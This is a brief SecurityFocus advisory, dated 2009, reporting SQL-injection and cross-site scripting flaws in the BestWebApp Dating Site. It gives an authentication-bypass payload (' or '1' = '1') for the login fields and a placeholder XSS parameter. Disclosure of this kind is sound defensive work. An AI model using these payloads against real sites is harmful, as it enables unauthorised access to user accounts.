Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

BestWebApp Dating Site Multiple Input Validation Vulnerabilities

An attacker can exploit these issues via a web client.

The following proofs of concept are available:

SQL-injection:
username = ' or '1' = '1'
passwd = ' or '1' = '1'

Cross-site scripting:
login_form.asp?msg=[xss here]







 

Privacy Statement
Copyright 2009, SecurityFocus